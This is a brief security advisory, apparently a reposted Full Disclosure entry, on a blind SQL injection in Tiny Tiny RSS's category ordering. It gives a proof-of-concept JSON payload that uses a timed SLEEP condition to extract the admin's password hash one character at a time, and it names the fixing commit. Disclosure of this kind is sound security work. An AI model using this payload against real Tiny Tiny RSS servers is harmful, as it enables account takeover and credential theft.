[FD] Tiny Tiny RSS Blind SQL Injection

# Exploit Title: Tiny Tiny RSS Blind SQL Injection # Date: 15-02-2016 # Software Link: http://tt-rss.org/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://ift.tt/1AaOgjR # Category: webapps 1. Description $item_id inside process_category_order() is not properly escaped. We control this value using $_POST['payload']. http://ift.tt/1QjWRSf 2. Proof of Concept Login as regular user.

{"items":[{"items":{"_reference":"CAT:1' AND order_id = (SELECT IF(substr(pwd_hash,1,1) = CHAR(77), SLEEP(5), 0) FROM ttrss_users WHERE id = 1) AND -- "},"id":"root"}]}

3. Solution: Update to version a5556c2471973e292dce615fe0c77fdbbc54405b

Source: Gmail -> IFTTT-> Blogger